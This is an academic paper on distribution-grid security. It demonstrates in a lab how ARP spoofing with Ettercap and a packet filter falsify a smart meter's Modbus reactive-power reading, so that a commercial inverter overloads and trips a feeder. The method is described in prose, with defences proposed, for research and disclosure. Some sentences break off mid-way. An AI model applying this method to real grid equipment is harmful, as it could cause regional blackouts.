Demonstration of Man in the Middle Attack on a Feeder Power Factor Correction Unit

Cyber security of distribution power systems is of an increasing and pressing importance due to the fast modernisation of current systems. Cyber attacks on distribution power systems may aim to operate the system inefficiently, steal private smart meter data or cause intentional false tripping of few or all feeders. In this paper, a Man in The Middle (MiTM) attack on a power factor correction unit is implemented and demonstrated to overload a distribution feeder and cause an intentional false tripping of the entire feeder causing regional blackout. Experimental implementation of the attack is carried out in a laboratory-scale setup using commercial power equipment under different loading conditions to demonstrate the effectiveness of this attack.

, where the attacker interrupts or sniffs the communication between a controller and the field devices or the Supervise Control and Data Acquisition (SCADA) system. MiTM attacks attacks could be deployed either to change the information exchanged at the Modbus TCP communication channel, or, in the passive reconnaissance scenario, to record and read the exchanged messages.
Countermeasures applied in order to secure the communication against such attacks are based on enhancing security features of the actual communication protocols. For instance, the authors in [10] improved Modbus protocol security by changing the packet format representation using encryption and checksum schemes such as SHA-2. Another security solution is the deployment of encrypted protocols for industrial control systems instead of open protocols that makes initiating such attacks a more challenging task. A protocol that is used to replace the traditional Modbus protocol is DNP3 secure authentication [11], designed not just to include encryption but also to enhance cyber security practises against well known intrusion methods. However, in the smart grids framework, there are several examples where these countermeasures have not been applied yet; Hence several smart IIoT enabled equipment (i.e., smart inverters supporting only modbus -Fronious, SMA, etc.) relies only on open protocols.
Significant research work has been carried out on cyber security of transmission power grids due to the powerful impact of cyber attacks on such grids and the possibility of cascading failure in worst case scenario [12]- [14]. However, cyber security of distribution power grids attracted less attention in literature as attacks on such systems do not pose a direct threat to system stability, despite the widespread of these grids and the possibility of targeted attacks against specific critical loads/feeders. Cyber attacks on distribution power systems may target smart meters, demand side management systems [15], distributed generation control systems, etc. In [16], a false data injection attack (FDIA) is performed on a centralised voltage control system of a distribution system. The aim of the demonstrated attack was to cause an undesirable overvoltage or undervoltage in the distribution system. The authors of [17] proposed a FDIA against state estimation of the distribution system. Such attacks, if not detected, may result in uneconomical operation of the system, operating the targeted distribution system out of the standard limits, or, tripping the distribution system in worst case scenario. An attack against smart metering infrastructure is proposed in [18] to mislead the Volt-VAr control system of a distribution system, aiming to cause overvoltage or undervoltage conditions in the system. An optimal Volt-VAr optimization system is proposed in [19] with capability of FDIAs mitigation. The authors in [20] proposed a neural network-based approach to detect FDIA on distribution system optimal power flow. The authors of [21], demonstrated several attacks on measurement devices and solar photovoltaic (PV) inverters in a simulation environment.
In this paper, MiTM attack on a reactive power compensation unit is exploited, aiming to overload the targeted feeder and cause an intentional false tripping of the feeder (regional blackout) without having a direct access to the feeder circuit breaker. In contrary to the theoretical studies in the literature, the specific attack is designed and implemented on actual devices in a laboratory-scale setup under two different loading conditions to demonstrate the effectiveness of the attack.
The rest of the paper is organized as follows. The targeted system is presented in Section II. The implemented MiTM attack is described in Section III and demonstrated on an experimental setup in Section IV. Finally, the paper is concluded in Section V.

II. SYSTEM DESCRIPTION
Reactive power compensation devices are typically installed at feeder point of common coupling (PCC) in order to support the system voltage and reduce reactive power flow between the grid and the feeder. As a result, the energy losses are reduced and the utilization of existing grid capacity can be maximized [22]. Dynamic reactive power compensators such as DSTATCOM [23], have the advantage over fixed capacitors due to DSTATCOM capability of compensating reactive power dynamically, under various feeder loading and operation conditions. Similarly, inverter-interfaced distributed generatoion units, such as solar PV inverters, can play DSTATCOM role [24], due to the multi-functional capabilities of smart inverters [25].
DSTATCOM is operated in one of three control modes, reactive power control mode, voltage control mode and power factor control mode. In the first mode, DSTATCOM supplies/consumes a fixed desired reactive power set by distribution system operator (DSO). In the second mode, voltage control mode, DSTATCOM provide reactive power compensation (Qc omp ) as a function of PCC voltage magnitude (V ), typically with a linear relation between Q comp and PCC voltage, i.e. Q − V droop. In the third mode, power factor control mode, DSTATCOM is controlled to generate/consume reactive power such that a constant power factor is maintained at the feeder PCC. Unity power factor operation is a common control setting that ensures reactive power neutralization of the feeder, where DSTATCOM generate/consume reactive power equal in magnitude of the feeder consummation/generation of reactive power. Power factor control mode is used in this paper, with a unity power factor reference point. The DSTATCOM system is called power factor correction (PFC) unit in this paper as a similar attack can be performed on any inverterinterfaced compensator.
Typical power factor correction unit connected to a feeder PCC is shown in Fig. 1. A smart meter is used to measure the feeder reactive power, Q f eeder , which is communicated through communication network to the PFC controller. Reactive power reference Q ref command is sent then from PFC controller to the inverter controller. The PFC is developed based on a simple Proportional (P) controller to ensure a unity power factor by compensating the feeder reactive power consumption considering the operational limits of the DSTAT-COM inverter. This ensures that the reactive power flow from the grid, Q grid = Q comp + Q f eeder approaches zero. The feeder is protected by a circuit breaker to trip the feeder under abnormal conditions such as overloading and short-circuits.
The communication of the measurements and the control set-points is performed through Local Area Network (LAN). Information is transmitted via Modbus TCP protocol, a clientserver configuration between the smart meter and the PFC controller and between the PFC controller and the inverter controller. The PFC controller generates set-point commands for regulating the injection reactive power by the inverter. This is achieved through the inverter Modbus interface, where the PFC controller (a) specifies the corresponding Modbus holding register to activate the constant reactive power control mode for the inverter and (b) writes in every control loop the reference value for injecting the set-point reactive power to the corresponding Modbus holding register of the interface [26]. The common 502 port is used for the read and write commands, thus the packets exchanged in the network are reported in plain hexadecimal representation.

III. IMPLEMENTED ATTACK
The threat model of this work considers that the attacker is allowed to take control of a workstation, that has direct access and it is located in the LAN of the grid setup. Moreover, an insider attack is considered, where attacker has knowledge of credentials and logins required for that workstation. Thus, the access can be either physically or remotely using Virtual Private Network (VPN) or other tools. Having access, on this The aim of the implemented attack is to create an abnormal operating condition that can trip the feeder without having a cyber or physical access to the feeder circuit breaker. This is done by interfering the feeder reactive power measurement Q f eeder transmitted to the PFC controller and replaced by a false valueQ f eeder such that the PFC inverter supplies/consumes reactive power Q comp , which instead of compensating the feeder reactive power, it is actually amplifying the total reactive power. Thus, the PFC reactive power (Qcomp) creates along with the feeder actual load (S f eeder = P f eeder + jQ f eeder ) an overloading condition of the feeder at PCC, which subsequently leads the feeder breaker to trip the feeder. The procedure of performing this particular attack on the communication layer is described as follows.
In order to perform the attack in the lab setup, two software tools are used, Wireshark [27] and Ettercap [28]. Wireshark is used for the first part of launching the MiTM attack, while Ettercap is a security tool for implementing MiTM in LAN using common Address Resolution Protocol (ARP) spoofing technique. The overall procedure of performing such an attack consists of three steps. In the first step, the aim of the attacker is to perform the ARP spoofing attack so that it can monitor the traffic exchanged between the feeder smart meter and the PFC controller, Fig. 1. As the attacker has access on the LAN, ARP spoofing can be performed, where the attacker sends (spoofed) ARP messages to both hosts, in order to associate MAC address of the target devices to the IP address of the attacker. This causes any traffic meant to be transmitted between sender and receiver to be sent to the attacker instead. In this work, this step is implemented via Ettercap and hence the channel between the smart meter and the PFC controller, is successfully interrupted. Data traffic is recorded by the attacker and passed to the controller without any modification on the actual content of it. The communication flow after the  Fig. 2(i).
In the second step, communicated packets are recorded and analysed by the attacker in order to derive the targeted measurement, which in this case represents the feeder reactive power Q f eeder . A Modbus TCP packet consists of the following fields: Transaction ID, Protocol ID, length, unit identifier, function code and data. Q f eeder measurement is part of the data field and thus analysis is focused on this part of the packet. For the specific smart meter used in this demonstration, the Modbus standard register that holds this value is register 7049. The main target of the attacker at this stage is not only to derive the hexadecimal representation of the targeted measurement but also to cover a range of possible values that these registers hold. Packet extraction and analysis for this part of the attack was implemented through Wireshark.
The final step of the attack, after recording and analysing the packets pattern, is to filter the packets generation, in which the packets are captured and manipulated to a specific false valueQ f eeder . Filter injection is part of Ettercap tool thus, an attack.filter file has been designed and generated by using if, search, and replace commands for replacing a range of values of the targeting measurement. By loading the compiled filter in Ettercap, all packets of read commands for Q f eeder register will be replaced with the non valid attacked value,Q f eeder . During the attack, and when the filter is loaded to Ettercap, the measurement values are changed and thus, the controller will read interfered values, as shown in Fig. 2(ii).

IV. RESULTS AND DISCUSSION
The laboratory scale experimental setup of Fig. 3 is used to demonstrate the implemented attack on a PFC unit. A three phase variable load is used to represent the feeder demand. A commercial 5 kVA three-phase inverter (Fronius Symo 5.0-3-M) is used as a feeder power factor correction unit where the maximum reactive power compensation has been limited to 3 kVAr. Lumel ND10 is used as a feeder smart meter to communicate Q f eeder through the laboratory local LAN network. The PFC controller is digitally implemented in a personal computer using a sample time of 2 sec. For the purpose of this experiment, the grid power is measured by another three phase smart meter, Janitza UMG 604. The maximum capacity of the feeder is assumed to be 5 kVA. Exceeding this maximum limit for certain time will create overloading conditions that will trip the protection relay and isolate the feeder. It is noteworthy that the feeder circuit breaker in this case is not connected to the communication layer, which is the case in practice. The isolation of circuit breaker from the communication network provides an additional security to avoid direct attacks against the feeder. Two cases of successful and unsuccessful attacks are demonstrated in this section as follows.

A. Case 1: Successful attack
In this case, the feeder is loaded by 75% of maximum feeder capacity (S max ) before initiating the attack, as shown in Fig.  4. Moreover, before launching the attack, the reactive power consumed by the feeder, Q f eeder = 1290 VAr, is compensated by the power factor compensation unit Q comp , and the reactive power consumed from the grid, Q grid , is close to zero.
At t = 30 sec, the implemented attack is launched as explained in Section III. While the actual reactive power consumed by the feeder Q f eeder remained almost the same as before initiating the attack, the attacker falsely injected a false It can be observed from Fig. 4 following the attack at t = 30 sec the apparent power withdrawn by the feeder is higher than the maximum capacity of the feeder S max . Therefore, a tripping signal is initiated at t = 90 sec, and the entire feeder is tripped. Hence, the attack results in the abnormal amplification (instead of compensation) of the reactive power of the feeder which indirectly causes overloading conditions to the feeder and this leads to a regional blackout of the feeder.
While the presented attack is implemented on a laboratory setup with a single inverter, realistic scenario may deploy a similar attack on multiple inverters in the feeder to create greater impact and increase the risk of taking the feeder out of service.

B. Case 2: Unsuccessful attack
In this case, the feeder is set to be lightly loaded as shown in Fig. 5. The reactive power consumed by the feeder is Q f eeder = 700 VAr, which is compensated accordingly by the inverter before launching the attack at t = 30 sec. Similarly to the attack performed in Case 1, the measured feeder reactive power is falsely replaced by a false reactive power signal Q f eeder = 2800 VAr, which caused the inverter to react by consuming similar amount of reactive power. Therefore, the feeder total apparent power is increased, however, less than the maximum limit of the feeder S max due to the light loading condition of the feeder. Consequently, the feeder does not trip, as S grid < S max and the attack is not successful since the attacked feeder is not overloaded.
It can be observed from Case 1 and Case 2 that two contributing factors can impact the effectiveness of the attack. The first factor is the loading conditions of the feeder, where heavily loaded feeder is more likely to be falsely tripped under this attack. The second factor is the capacity of the attacked PFC unit. A higher capacity of the PFC unit can make the developed attack more effective.
V. CONCLUSION In this paper, a man in the middle attack on a feeder power factor correction unit is implemented and demonstrated in a laboratory-scale setup using a commercial inverter. The aim of the attack was to trip the targeted feeder indirectly (causing regional blackout) without having a remote access to the feeder circuit breaker. In the demonstrated attack, the attacker could take the advantage of communicating smart meter measurement through a local area network, interrupt this measurement and inject desired false measurement data instead. The demonstration of this attack on an experimental setup revealed the effectiveness and the damage that this attack may cause.
Defensive mechanisms against the presented attack may include encrypting the measurement communication protocol, strengthening the network security e.g. firewall, communication network segmentation, etc. The presented work, being implemented on a commercial setup, highlights the potential vulnerabilities in the current industrial practice and the importance of implementing such defensive mechanisms.
Future work may include increasing the scalability and impact of this attack and proposing intrusion detection schemes to avoid the false tripping of the feeder.

VI. ACKNOWLEDGEMENT
This work is supported by the European Regional Development